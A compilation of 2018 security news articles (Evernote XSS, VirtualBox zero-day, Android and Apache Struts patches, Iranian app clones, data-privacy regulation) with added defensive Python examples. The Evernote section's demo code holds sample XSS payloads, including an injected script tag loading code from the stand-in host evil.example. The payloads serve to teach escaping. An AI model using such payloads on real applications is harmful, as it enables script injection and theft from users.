The first Hack the Air Force bug bounty program was launched by the United States Air Force in April 2017 to test the security of its networks and computer systems.

That program led to the discovery of over 200 valid vulnerabilities, and researchers received more than $130,000. In February 2018, HackerOne announced the results of the second round, Hack the Air Force 2.0: the US Government paid more than $100,000 for over 100 reported vulnerabilities.

XSS flaw in Evernote allows attackers to execute commands and steal files
8.11.2018 securityaffairs

A security expert discovered a stored XSS flaw in the Evernote app for Windows that could be exploited to steal files and execute arbitrary commands.
A security expert who goes online by the moniker @sebao has discovered a stored cross-site scripting (XSS) vulnerability in the Evernote application for Windows that could be exploited by an attacker to steal files and execute arbitrary commands.

The expert noticed that when a user adds a picture to a note and then renames it, JavaScript code can be supplied in place of the name. Sebao discovered that if the note was shared with another Evernote user, the code would be executed when the recipient clicked on the picture.

In September, Evernote addressed the stored XSS flaw with the release of version 6.16, but the fix was incomplete.

The expert TongQing Zhu from Knownsec 404 Team discovered that it was still possible to execute arbitrary code with a variant of the above trick.

TongQing Zhu discovered that the code supplied in place of the name could load a Node.js script from a remote server; the script is executed via NodeWebKit, which Evernote uses in presentation mode.

“I find Evernote has a NodeWebKit in C:\\Program Files(x86)\Evernote\Evernote\NodeWebKit and Present mode will use it. Another good news is we can execute Nodejs code by stored XSS under Present mode.” explained TongQing Zhu.

The attacker only needs to trick an Evernote user into opening a note in presentation mode; in this way he will be able to steal arbitrary files and execute commands.

TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.

The flaw was tracked as CVE-2018-18524 and was initially addressed with the release of Evernote for Windows 6.16.1 beta in October. The final patch was released earlier this month with the release of Evernote 6.16.4.
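The root cause described above is the classic one: a user-controlled attachment name interpolated into markup without encoding for the context it lands in. The block below is an added example for this page, modelled in Python rather than Evernote's own rendering code (which the page does not show); the constructed attacker names and the single-img rendering are assumptions made to demonstrate the defect and its fix. It renders the same name through a naive and a context-encoding renderer and then parses the result to count what a browser would actually see as script hooks.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple


def render_attachment_vulnerable(name: str, src: str) -> str:
    """Interpolates the user-controlled name straight into markup: the pattern behind stored XSS."""
    return f'<img src="{src}" alt="{name}" title="{name}">'


def render_attachment_safe(name: str, src: str) -> str:
    """Encodes every interpolated value for the attribute context before it reaches the markup."""
    def q(value: str) -> str:
        return html.escape(value, quote=True)  # escapes & < > " and '
    return f'<img src="{q(src)}" alt="{q(name)}" title="{q(name)}">'


class _TagCollector(HTMLParser):
    """Records each start tag with its attribute names, duplicates included."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, List[str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [k for k, _ in attrs]))


def extract_tags(markup: str) -> List[Tuple[str, List[str]]]:
    """Tags and attribute names as the HTML parser sees them after the rendering step."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def event_handlers(markup: str) -> List[str]:
    """Attribute names beginning with 'on', i.e. places where the browser would run script."""
    return [a for _, attrs in extract_tags(markup) for a in attrs if a.startswith("on")]


# Constructed attacker-controlled file names (not from the advisory):
# one breaks out of the alt="" attribute, the other closes the tag and injects a remote script.
BREAKOUT_NAME = '" onclick="alert(document.domain)'
SCRIPT_NAME = '"><script src="http://evil.example/x.js"></script><img alt="'

if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_attachment_vulnerable), ("safe", render_attachment_safe)):
        out = renderer(BREAKOUT_NAME, "pic.png")
        print(f"{label}: handlers={event_handlers(out)} tags={[t for t, _ in extract_tags(out)]}")
```

The check is done by parsing rather than by grepping for `onclick`, because the encoded output still contains that substring as harmless text; only a parser tells you whether it became an attribute.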

TongQing Zhu has published two PoC videos demonstrating exploitation of the flaw.


World Wide Web Inventor Wants New 'Contract' to Make Web Safe
8.11.2018 securityweek

The inventor of the World Wide Web on Monday called for a "contract" to make the internet safe and accessible for everyone as Europe's largest tech event began in Lisbon amid a backlash over the industry's role in spreading "fake news".

Some 70,000 people are expected to take part in the four-day Web Summit, dubbed "the Davos for geeks", including speakers from leading global tech companies, politicians and start-ups hoping to attract attention from the over 1,500 investors who are scheduled to attend.

Tech firms now find themselves on the defensive, with critics accusing them of not doing enough to curb the spread of "fake news" which has helped polarise election campaigns around the world and of maximising profits by harvesting data on consumers’ browsing habits.

British computer scientist Tim Berners-Lee, who in 1989 invented the World Wide Web as a way to exchange information, said the internet had deviated from the goals its founders had envisaged.

"All kinds of things have gone wrong. We have fake news, we have problems with privacy, we have people being profiled and manipulated," he said in an opening address.

Berners-Lee, 63, called on governments, companies and citizens to iron out a "complete contract" for the web that will make the internet "safe and accessible" for all by May 2019, the date by which 50 percent of the world will be online for the first time.

'Going through a funk'

He has just launched Inrupt, a start-up which is building an open source platform called "Solid" which will decentralise the web and allow users to choose where their data is kept, along with who can see and access it.

Solid intends to allow users to bypass tech giants such as Google and Facebook. The two companies now have direct influence over nearly three quarters of all internet traffic thanks to the vast number of apps and services they own, such as YouTube, WhatsApp and Instagram.

Employees of Google, Facebook and other tech giants have in recent months gone public with their regrets, calling the products they helped build harmful to society and overly addictive.

Tech giants are also under fire for having built up virtual monopolies in their areas.

Amazon accounts for 93 percent of all e-book sales while Google swallows up 92 percent of all European internet-search ad spending.

"I think technology is going through a funk... it's a period of reflection," Web Summit founder and CEO Paddy Cosgrave told AFP.

"With every new technology you go through these cycles. The initial excitement of the printed press was replaced in time by a great fear that it was actually a bad thing. Over time it has actually worked out OK."

Violent voices magnified

Among those scheduled to speak at the event is Christopher Wylie, a whistleblower who earlier this year said users’ data from Facebook was used by British political consultancy Cambridge Analytica to help elect US President Donald Trump -- a claim denied by the company.

Another tech veteran who has become critical of the sector, Twitter co-founder Ev Williams, will on Thursday deliver the closing address.

He left Twitter in 2011 and went on to co-found online publishing platform Medium, which is subscription based and unlike Twitter favours in-depth writing about issues.

The problem with the current internet model is that negative content gets more attention online, and thus gains more advertisers, according to Mitchell Baker, the president of the Mozilla Foundation, a non-profit organisation which promotes Internet innovation.

"Today everyone has a voice but the problem is... the loudest and often most violent voices get magnified because the most negative, scariest things attract our attention," she told AFP in a recent interview.

The Web Summit was launched in Dublin in 2010 and moved to Lisbon six years later. The Portuguese government estimates the event will generate 300 million euros ($347 million) for Lisbon in hotel and other revenues.

VMware Unveils New Blockchain Service
8.11.2018 securityweek

One of the new technologies announced on Tuesday by VMware at its VMworld 2018 Europe conference is VMware Blockchain, which aims to provide enterprises with a decentralized trust infrastructure based on a permissioned blockchain.

The blockchain is a distributed database consisting of blocks that are linked and protected against unauthorized modifications using cryptography. Transactions are only written to a block after they are verified by a majority of nodes.

While blockchain is mainly known for its role as the public transaction ledger for cryptocurrencies, companies have been increasingly using blockchain for other purposes, including for identity verification and securing data and devices.

VMware launches VMware Blockchain

There are three types of blockchain networks: public, private and permissioned. Public blockchain is mainly used for cryptocurrencies such as bitcoin, where anyone can join and any participant can make changes. In the case of a private blockchain, only verified participants can contribute. Permissioned blockchain is a mix between public and private and it provides numerous customization options.

Permissioned blockchain is fast and it’s increasingly used for enterprise applications, which is why the virtualization giant wants to help its customers by providing a hybrid, scalable and managed blockchain service.

“VMware Blockchain will provide the foundation for decentralized trust while delivering enterprise-grade scalability, reliability, security and manageability. The service will be integrated into existing VMware tools to help protect the network and compute functions that underlie a true enterprise blockchain,” said Mike DiPetrillo, blockchain senior director at VMware.

VMware Blockchain is being developed in collaboration with Dell Technologies, Deloitte and WWT, and it will be supported by both VMware products and IBM Cloud.

According to VMware, the new platform allows enterprises to deploy nodes across different cloud environments, it provides a central management interface, along with monitoring and auditing capabilities, and offers developers the tools and guidance they need.

VMware Blockchain is currently in beta. Organizations interested in testing it have been instructed to contact VMware.

Hackers Target Telegram, Instagram Users in Iran
8.11.2018 securityweek Hacking

Hackers have been targeting Iranian users of Telegram and Instagram with fake login pages, app clones and BGP hijacking in attacks that have been ongoing since 2017, Cisco Talos reveals.

Banned in Iran, Telegram is a popular target for greyware, software that provides the expected functionality but is also suspicious enough to be considered a potentially unwanted program (PUP). Attacks on Iranian users differ in complexity, based on resources and methods, and those analyzed by Cisco were aimed at stealing personal and login information.

As part of these attacks, users were tricked into installing Telegram clones that can access a mobile device’s full contact lists and messages. The fake Instagram apps, on the other hand, were designed to send full session data to the attackers, who would then gain full control of the account in use.

“We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country,” Cisco says.

The greyware targeting Iranian users includes software from andromedaa.ir, a developer targeting both iOS and Android with apps that are not in the official stores and which claim to boost users' exposure on Instagram or Telegram by increasing likes, comments and followers.

The email address used to register the andromedaa.ir domain was also used for domains distributing cloned Instagram and Telegram applications, the researchers discovered. Without even requiring the user's Instagram password, the operator can take over the user's session, while the Telegram clone provides access to the contact list and messages.

In addition to greyware, the attackers were also observed using fake login pages to target users in Iran, a technique that Iran-connected groups like "Charming Kitten" have long been using. Other actors hijacked BGP routes to redirect the victims' traffic, a type of attack that requires cooperation from an Internet service provider (ISP) since it operates on the routing infrastructure rather than on the device.

Although all of the observed attacks targeted Iran, Cisco's security researchers did not find a connection between them. The threat, however, looms over users worldwide, especially those in countries like Iran and Russia, where Telegram and similar apps are banned, and these are only some of the techniques state-sponsored actors use to deploy surveillance mechanisms, Cisco notes.

In Iran, the researchers found several Telegram clones with thousands of installations that contact IP addresses located in Iran, and some of them claim to be able to circumvent the ban the Iran government has put on the encrypted communication service.

“The activity of these applications is not illegal, but it gives its operators total control over the messaging applications, and to some extent, users’ devices,” the security researchers point out.

Researcher Drops Oracle VirtualBox Zero-Day
8.11.2018 securityweek

A researcher has disclosed the details of a zero-day vulnerability affecting Oracle’s VirtualBox virtualization software. The flaw appears serious as exploitation can allow a guest-to-host escape.

Russian researcher Sergey Zelenyuk discovered the security hole and he decided to make his findings public before giving Oracle the chance to release a patch due to his “disagreement with [the] contemporary state of infosec, especially of security research and bug bounty.”

According to Zelenyuk, the vulnerability affects VirtualBox 5.2.20 and prior versions – 5.2.20 is the latest version, released on October 16 – and it can be exploited on any host or guest operating system as the underlying bugs affect shared code. The expert has tested his exploit, which he claims is “100% reliable,” on Ubuntu 16.04 and 18.04 x86-64 guests, but he believes the attack also works against Windows.

An attack can only be carried out against virtual machines using an Intel PRO/1000 MT Desktop (82540EM) network adapter (E1000) attached in network address translation (NAT) mode, which is the default configuration.

The security hole, caused by memory corruption bugs, allows an attacker with root or administrator privileges on the guest system to escape to the host userland (ring 3). From there, they may be able to obtain kernel privileges (ring 0) on the host by exploiting other vulnerabilities. Exploitation starts by loading a Linux kernel module (LKM) in the guest operating system.

“Elevated privileges are required to load a driver in both OSs. It's common and isn't considered an insurmountable obstacle. Look at the Pwn2Own contest where researchers use exploit chains: a browser that opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0, where there is anything you need to attack a hypervisor from the guest OS,” the researcher explained in a post on GitHub.

“The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it's mostly not audited yet,” he added.

While some agree with Zelenyuk regarding the current state of bug bounty programs, others questioned his decision.

Contacted by SecurityWeek, Oracle declined to comment and instead pointed to its vulnerability disclosure policies.

Until a patch is made available, users can protect themselves against potential attacks by changing the network adapter of their virtual machines to AMD PCnet or to the paravirtualized (virtio-net) adapter. Another mitigation is to avoid NAT mode for the adapter, Zelenyuk said.
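Because the exposed configuration (E1000 82540EM plus NAT) is the default, the practical question is which existing VMs carry it. The script below is an added example for this page, not the researcher's or Oracle's code. It assumes the `key="value"` output format of `VBoxManage showvminfo <vm> --machinereadable`, in which the attachment mode and adapter type of slot N appear as `nicN` and `nictypeN`, and it assumes `VBoxManage modifyvm --nictypeN virtio` as the remediation command; the sample output is constructed to mimic that format so the logic runs offline.

```python
import re
import shutil
import subprocess
from typing import Dict, List

# The E1000 variant the disclosed bugs live in, as `VBoxManage showvminfo --machinereadable` names it (assumption).
VULNERABLE_NICTYPE = "82540EM"
REQUIRED_MODE = "nat"

_KV = re.compile(r'^(?P<key>[A-Za-z0-9_.\-]+)=(?P<val>"(?:[^"\\]|\\.)*"|[^"\n]*)$')


def parse_showvminfo(text: str) -> Dict[str, str]:
    """Turn key="value" lines into a dict; quotes are stripped, malformed lines ignored."""
    info: Dict[str, str] = {}
    for line in text.splitlines():
        m = _KV.match(line.strip())
        if not m:
            continue
        val = m.group("val")
        if val.startswith('"') and val.endswith('"'):
            val = val[1:-1]
        info[m.group("key")] = val
    return info


def exposed_nics(info: Dict[str, str]) -> List[int]:
    """Slots attached in NAT mode with the 82540EM adapter: the combination the exploit needs."""
    hits = []
    for key, mode in info.items():
        m = re.fullmatch(r"nic(\d+)", key)
        if not m:
            continue
        slot = int(m.group(1))
        if mode.lower() == REQUIRED_MODE and info.get(f"nictype{slot}", "").upper() == VULNERABLE_NICTYPE:
            hits.append(slot)
    return sorted(hits)


def remediation(vm: str, slot: int) -> str:
    """Switch the slot to the paravirtualised adapter, one of the two workarounds given by the researcher."""
    return f'VBoxManage modifyvm "{vm}" --nictype{slot} virtio'


def audit_text(vm: str, text: str) -> List[str]:
    return [remediation(vm, slot) for slot in exposed_nics(parse_showvminfo(text))]


def audit_live() -> Dict[str, List[str]]:
    """Query every registered VM through VBoxManage; empty when the tool is not on PATH."""
    exe = shutil.which("VBoxManage")
    if not exe:
        return {}
    listing = subprocess.run([exe, "list", "vms"], capture_output=True, text=True, check=True).stdout
    results: Dict[str, List[str]] = {}
    for m in re.finditer(r'^"(.+)" \{[0-9a-f-]+\}$', listing, re.M):
        vm = m.group(1)
        info = subprocess.run([exe, "showvminfo", vm, "--machinereadable"],
                              capture_output=True, text=True, check=True).stdout
        fixes = audit_text(vm, info)
        if fixes:
            results[vm] = fixes
    return results


# Constructed sample in the machine-readable format: slot 1 is the default exposed setup,
# slot 2 is E1000 but bridged, slot 3 is NAT but already virtio, slot 4 is unused.
SAMPLE = '''name="ubuntu-18.04-test"
VMState="poweroff"
nic1="nat"
nictype1="82540EM"
nic2="bridged"
nictype2="82540EM"
nic3="nat"
nictype3="virtio"
nic4="none"
'''

if __name__ == "__main__":
    for cmd in audit_text("ubuntu-18.04-test", SAMPLE):
        print(cmd)
    for vm, cmds in audit_live().items():
        print(vm, "->", "; ".join(cmds))
```

Switching to virtio-net only helps if the guest has a driver for it (Linux does; Windows needs the virtio drivers installed), so the fallback for other guests is the AMD PCnet adapter or leaving NAT mode altogether, as the researcher suggested.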

Google Removes Vulnerable Library from Android
8.11.2018 securityweek

Google this week released the November 2018 set of security patches for its Android platform, which address dozens of Critical and High severity vulnerabilities in the operating system.

The addressed issues include remote code execution bugs, elevation of privilege flaws, and information disclosure vulnerabilities, along with a denial of service. Impacted components include Framework, Media framework, System, and Qualcomm components.

“The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google explains.

The Internet giant also announced that the libxaac library has been marked as experimental and is no longer used in production Android builds. The reason is the discovery of multiple vulnerabilities in the library; Google lists 18 CVEs impacting it.

As usual, the company split the fixes into two parts, with the 2018-11-01 security patch level addressing 17 flaws, including four rated Critical severity (all of which impact Media framework).

This security patch level fixes seven elevation of privilege bugs (two rated Critical, four High severity, and one Medium), three remote code execution bugs (two Critical and one High severity), six information disclosure issues (all rated High severity) and one denial of service (Medium).

The 2018-11-05 security patch level, on the other hand, patches 19 issues, three of which were rated Critical.

Two of the bugs impact the Framework component, while the remaining 17 were addressed in Qualcomm components, including 14 issues in Qualcomm closed-source components (3 Critical and 11 High risk).

According to Google, it has no reports of active customer exploitation or abuse of these issues. The company also notes that exploitation of vulnerabilities is more difficult on newer versions of Android and encourages users to update as soon as possible.

In addition to these patches, Pixel and Nexus devices receive fixes for three additional vulnerabilities. These include an elevation of privilege in HTC components and two other bugs in Qualcomm components. All three are rated Medium severity.

“All Pixel devices running Android 9 will receive an Android 9 update as part of the November OTA. This quarterly release contains many functional updates and improvements to various parts of the Android platform and supported Pixel devices,” Google says.

A series of functional updates were also pushed to these devices, to improve performance for the use of picture-in-picture, Strongbox symmetric key generation requests, and stability for notifications.

UK Regulator Calls for Tougher Rules on Personal Data Use
7.11.2018 securityweek 

Britain's data commissioner on Tuesday called for tougher rules governing the use of personal data by political campaigns around the world, declaring that recent investigations have shown a disturbing disregard for voters and their privacy.

Speaking to the U.K. Parliament's media committee, Elizabeth Denham updated lawmakers on her office's investigation into the use of data analysis by political campaigns - a probe that has already seen Facebook slapped with a maximum fine for data misuse. Denham warned that democracy is under threat because behavioral targeting techniques developed to sell products are now being used to promote political campaigns and candidates.

"I don't think that we want to use the same model that is used to sell us holidays and shoes and cars to engage with people and voters," she said. "I think people expect more than that."

New rules are needed to govern advertising and the use of data, Denham said. She called on all players — the government and regulators but also the big internet firms like Facebook and smaller brokers of online data — to reassess their responsibilities in the era of big data.

"We really need to tighten up controls across the entire ecosystem because it matters to our democratic processes," she said.

The U.K. data regulator is conducting a broad inquiry into how political parties, data companies and social media platforms use personal information to target voters during political campaigns, including Britain's 2016 Brexit referendum on EU membership. The investigation followed allegations that British consultancy Cambridge Analytica improperly used information from more than 87 million Facebook accounts to manipulate elections.

Denham said legal systems had failed to keep up with the rapid development of the internet, and that tech companies need to be subject to greater oversight.

"I think the time for self-regulation is over," she said. "That ship has sailed."

Committee chair Damian Collins said he heard her opinion "loudly" and repeated his demand that Facebook CEO Mark Zuckerberg testify before his committee.

As she updated lawmakers on the probe, Denham announced fines for the campaign backing Britain's departure from the European Union and an insurance company founded by its millionaire backer totaling 135,000 pounds ($176,000) for breaches of data laws.

Denham said the Brexit campaign group Leave.EU and Eldon Insurance company — founded by businessman Arron Banks —were fined 60,000 pounds each for "serious breaches" of electronic marketing laws.

Leave.EU was also fined 15,000 pounds for a separate breach in which almost 300,000 emails were sent to Eldon customers with a newsletter for the Brexit campaign group.

The data watchdog is also "investigating allegations that Eldon Insurance Services Limited shared customer data obtained for insurance purposes with Leave.EU."

Facebook Blocks 115 Accounts on Eve of US Election
7.11.2018 securityweek 

Facebook said Monday it blocked some 30 accounts on its platform and 85 more on Instagram after police warned they may be linked to "foreign entities" trying to interfere in the US midterm election.

The announcement came shortly after US law enforcement and intelligence agencies said that Americans should be wary of Russian attempts to spread fake news. The election is Tuesday.

A study published last week found that misinformation on social media was spreading at a greater rate than during the run-up to the 2016 presidential vote, which Russia is accused of manipulating through a vast propaganda campaign in favor of Donald Trump, the eventual winner.

"On Sunday evening, US law enforcement contacted us about online activity that they recently discovered and which they believe may be linked to foreign entities," Facebook head of cybersecurity policy Nathaniel Gleicher said in a blog post.

"We immediately blocked these accounts and are now investigating them in more detail."

The investigation so far identified around 30 Facebook accounts and 85 Instagram accounts that appeared to be engaged in "coordinated inauthentic behavior," Gleicher said.

He added that all the Facebook pages associated with the accounts appeared to be in French or Russian.

The Instagram accounts were mostly in English, with some "focused on celebrities, others political debate."

"Typically, we would be further along with our analysis before announcing anything publicly," Gleicher said.

"But given that we are only one day away from important elections in the US, we wanted to let people know about the action we've taken and the facts as we know them today."

'Junk News'

Despite an aggressive crackdown by social media firms, so-called "junk news" is spreading at a greater rate than in 2016 on social media ahead of Tuesday's US congressional election, Oxford Internet Institute researchers said in a study published Thursday.

Twitter said Saturday it deleted a "series of accounts" that attempted to share disinformation. It gave no number.

Facebook last month said it took down accounts linked to an Iranian effort to influence US and British politics with messages about charged topics such as immigration and race relations.

The social network identified 82 pages, groups and accounts that originated in Iran and violated policy on coordinated "inauthentic" behavior.

Gleicher said at the time there was overlap with accounts taken down earlier this year and linked to Iranian state media, but the identity of the culprits has yet to be determined.

Posts on the accounts or pages, which included some hosted by Facebook-owned Instagram, focused mostly on "sowing discord" via strongly divisive issues rather than on particular candidates or campaigns.

Sample posts shared included inflammatory commentary about US President Donald Trump, British Prime Minister Theresa May and the controversy around freshly appointed US Supreme Court Justice Brett Kavanaugh.

War room

Major online social platforms have been under intense pressure to avoid being used by "bad actors" out to sway outcomes by publishing misinformation and enraging voters.

Facebook weeks ago opened a "war room" at its Menlo Park headquarters in California to be a nerve center for the fight against misinformation and manipulation of the largest social network by foreign actors trying to influence elections in the United States and elsewhere.

The shutdown of thousands of Russian-controlled accounts by Twitter and Facebook -- plus the indictments of 14 people from Russia's notorious troll farm the Internet Research Agency -- have blunted but by no means halted their efforts to influence US politics.

Facebook, which has been blamed for doing too little to prevent misinformation efforts by Russia and others in the 2016 US election, now wants the world to know it is taking aggressive steps with initiatives like the war room.

The war room is part of stepped up security announced by Facebook, which will be adding some 20,000 employees.

Apache Struts Users Told to Update Vulnerable Component
7.11.2018 securityweek 

Apache Struts developers are urging users to update a file upload library due to the existence of two vulnerabilities that can be exploited for remote code execution and denial-of-service (DoS) attacks.

The team behind the open source development framework pointed out that the Commons FileUpload library, which is the default file upload mechanism in Struts 2, is affected by a critical remote code execution vulnerability.

The flaw, tracked as CVE-2016-1000031, was discovered by Tenable researchers back in 2016. It was patched with the release of Commons FileUpload version 1.3.3 in June 2017.

“There exists a Java Object in the Apache Commons FileUpload library that can be manipulated in such a way that when it is deserialized, it can write or copy files to disk in arbitrary locations. Furthermore, while the Object can be used alone, this new vector can be integrated with ysoserial to upload and execute binaries in a single deserialization call,” Tenable said when it disclosed the security bug.

Struts versions after 2.5.12 already ship with version 1.3.3 of the library, but applications using Struts 2.3.36 and earlier need to update the library manually by replacing the commons-fileupload JAR file in WEB-INF/lib with the patched version.

Version 1.3.3 of the Commons FileUpload library also includes a fix for a less severe DoS vulnerability discovered in 2014 and tracked as CVE-2014-0050.

Malicious actors could exploit this flaw to launch DoS attacks on publicly accessible sites, Apache Struts developers warned. This vulnerability was first patched in February 2014 with the release of version 1.3.1.

Johannes Ullrich, dean of research at the SANS Technology Institute, also advised users to check for other copies of the library on their systems, since Struts is not the only project that bundles it.
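Ullrich's point is the one most teams miss: the fix is "find every copy of commons-fileupload older than 1.3.3", not "patch Struts". The scanner below is an added example for this page, not Apache's or SANS's tooling. It assumes the jar is named `commons-fileupload[-<version>].jar` and, when the version is absent from the file name, that the manifest carries an `Implementation-Version` or `Bundle-Version` header; the sample tree it builds in a temporary directory is constructed for the demonstration.

```python
import os
import re
import shutil
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]
FIXED_RCE: Version = (1, 3, 3)   # CVE-2016-1000031 fixed in 1.3.3
FIXED_DOS: Version = (1, 3, 1)   # CVE-2014-0050 fixed in 1.3.1
_JAR = re.compile(r"^commons-fileupload(?:-(\d+(?:\.\d+)*))?\.jar$", re.IGNORECASE)


def parse_version(text: str) -> Version:
    return tuple(int(p) for p in text.strip().split("."))


def jar_version(path: str) -> Optional[Version]:
    """Version from the file name, else from the manifest inside the jar, else None."""
    m = _JAR.match(os.path.basename(path))
    if m and m.group(1):
        return parse_version(m.group(1))
    try:
        with zipfile.ZipFile(path) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError, OSError):
        return None
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip() in ("Implementation-Version", "Bundle-Version"):
            try:
                return parse_version(value)
            except ValueError:
                return None
    return None


def affected_cves(version: Optional[Version]) -> List[str]:
    """CVEs a copy is still exposed to; an unidentifiable version is treated as unpatched."""
    if version is None:
        return ["CVE-2014-0050", "CVE-2016-1000031"]
    cves = []
    if version < FIXED_DOS:
        cves.append("CVE-2014-0050")
    if version < FIXED_RCE:
        cves.append("CVE-2016-1000031")
    return cves


def find_fileupload_jars(root: str) -> List[Tuple[str, Optional[Version]]]:
    """Walk the whole tree, not just WEB-INF/lib: other applications bundle this library too."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if _JAR.match(name):
                path = os.path.join(dirpath, name)
                hits.append((path, jar_version(path)))
    return sorted(hits)


def vulnerable_jars(root: str) -> Dict[str, List[str]]:
    return {p: affected_cves(v) for p, v in find_fileupload_jars(root) if affected_cves(v)}


def build_sample_tree(base: str) -> str:
    """Constructed layout: an unpatched Struts 2.3 app, a patched app, and a stray copy elsewhere."""
    layout = {
        "app1/WEB-INF/lib/commons-fileupload-1.3.2.jar": None,
        "app2/WEB-INF/lib/commons-fileupload-1.3.3.jar": None,
        "app2/WEB-INF/lib/commons-io-2.2.jar": None,
        "tools/lib/commons-fileupload.jar": "1.2.2",   # version recorded only in the manifest
    }
    for rel, manifest_version in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        manifest = "Manifest-Version: 1.0\n"
        if manifest_version:
            manifest += f"Implementation-Version: {manifest_version}\n"
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", manifest)
    return base


def audit_sample() -> Tuple[Dict[str, Optional[Version]], Dict[str, List[str]]]:
    """Run the scanner over the constructed tree; paths are returned relative to it."""
    base = tempfile.mkdtemp(prefix="fileupload-audit-")
    try:
        build_sample_tree(base)
        found = {os.path.relpath(p, base): v for p, v in find_fileupload_jars(base)}
        bad = {os.path.relpath(p, base): c for p, c in vulnerable_jars(base).items()}
    finally:
        shutil.rmtree(base, ignore_errors=True)
    return found, bad


if __name__ == "__main__":
    import sys
    report = vulnerable_jars(sys.argv[1]) if len(sys.argv) > 1 else audit_sample()[1]
    for path, cves in report.items():
        print(f"{path}: {', '.join(cves)}")
```

Run it with a directory argument (for example the servlet container's webapps root, or `/`) to scan a real host; with no argument it audits the constructed tree. Shaded or repackaged copies of the library inside other jars will not be caught by a file-name match, so treat a clean result as necessary rather than sufficient.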

It’s not uncommon for malicious hackers to exploit Apache Struts vulnerabilities in their attacks, even one year after they have been patched.

One recent example involves CVE-2018-11776, an easy-to-exploit bug that cybercriminals have exploited to deliver cryptocurrency miners.

U.S. Government Publishes New Insider Threat Program Maturity Framework
7.11.2018 securityweek 

National Insider Threat Task Force (NITTF) Releases New Insider Threat Program Maturity Framework

Some 18 months after WikiLeaks began to publish the Iraq War Logs exfiltrated by Chelsea Manning (at that time, Bradley Manning), President Obama issued a Presidential Memorandum: National Insider Threat Policy and Minimum Standards for Executive Branch Insider Threat Programs Memorandum for the Heads of Executive Departments and Agencies.

"The resulting insider threat capabilities," it said, "will strengthen the protection of classified information across the executive branch and reinforce our defenses against both adversaries and insiders who misuse their access and endanger our national security."

It clearly didn't work. A year later, the Edward Snowden leaks began to appear -- and leaks have continued ever since. In 2016, the hacking group known as Shadow Brokers began to leak NSA tools (including the EternalBlue details that were used by WannaCry and NotPetya); but there have been suggestions that the documents were initially leaked to the Shadow Brokers by NSA contractor Hal Martin.

In 2017, the Vault 7 (CIA files) began to appear. In June 2018, Joshua Adam Schulte -- a former employee of first the NSA and then the CIA -- was charged with the theft of the classified CIA documents published by WikiLeaks.

On November 1, 2018, the National Insider Threat Task Force (NITTF), operating under the joint leadership of the Attorney General and the Director of National Intelligence, published a new Insider Threat Program Maturity Framework (PDF). The purpose, announced a statement from the Office of the Director of National Intelligence, is "to help executive branch departments and agencies' insider threat programs advance beyond the Minimum Standards to become more proactive, comprehensive, and better postured to deter, detect, and mitigate insider threat risk."

The new Framework takes key elements from the Obama 'minimum standards' memorandum and enhances and expands them so that departments and agencies (D/As) using them can "garner greater benefits from insider threat program resources, procedures, and processes." It comprises 19 elements, each of which identifies an attribute of an advanced Insider Threat Program (InTP). Each element, according to the introduction to the Framework, "provides amplifying information to assist programs in strengthening the effectiveness of the associated minimum standard."

This Framework is specifically designed for government departments and agencies, and its primary purpose is to defend national security rather than commercial IP. D/As are very different in make-up, mission and culture from private industry -- but private industry has its own, potentially larger, insider threat to manage. There will be a temptation for private industry to seek to adopt the same framework.

For example, David Wilcox, VP of federal for Dtex Systems, has commented, "The Dtex annual insider threat intelligence report revealed that insider threats are active in all industries, including government. This Framework comes at a pivotal time, when insider threats are on the rise and the damages they cause are increasing. This framework points out key elements for addressing insider threats, which could be used by any industry to reduce related risks."

Some of the Framework's elements could certainly be transposed to and used by private industry. Others will need to be approached with caution. For example, the very first element describes "the joint responsibility and commitment of D/A and InTP leadership to develop InTP infrastructure and personnel and promote the importance of addressing the insider threat at a level sufficient to create an effective and enduring Program."

The third element says, "It is crucial for InTPs in countering the insider threat to maintain compliance with changes in the policy, legal, regulatory, workforce, and technology environments of their D/A. The InTP can remain current through participation in D/A forums involved in policy-making, regulatory developments, and technology infrastructure advances to assess the impact of any changes on Program compliance and effectiveness."

This is already beginning to look like a new department with a high-level and highly specialist leadership that will undoubtedly be expensive. With companies already questioning the need to have a new Data Processing Officer -- as required by GDPR -- the need for more expense that is not required by law will undoubtedly be questioned. Any organization seeking to use the Framework as a guide for its own insider threat program will first need to distil the guidelines into something affordable.

There are more banana skins for private industry in the Framework. Element 7 describes an insider threat awareness training requirement -- which is good practice. But where do you go from there? "InTPs can drive cultural change within their D/As and build a culture of insider threat awareness and responsibility for reporting potential insider threats through communications campaigns."

The danger here is that it could lead to at least subtle encouragement for staff to report each other as potential insider threats. That could easily go horribly wrong and lead to a deteriorating workplace culture.

This is not to say that the Framework is devoid of good practices that could transpose to private industry. Elements 14 and 15 offer advice on insider threat detection. The former suggests the use of advanced analytics and anomaly detection. Such tools, suggests Element 14, "can help manage large data volume as a first step in establishing a baseline from which to identify anomalous behavior. Data analytic tools can help insider threat analysts to contextualize the behavior in supporting decisions to conduct inquiries, refer matters to response elements, and/or develop mitigation strategies."

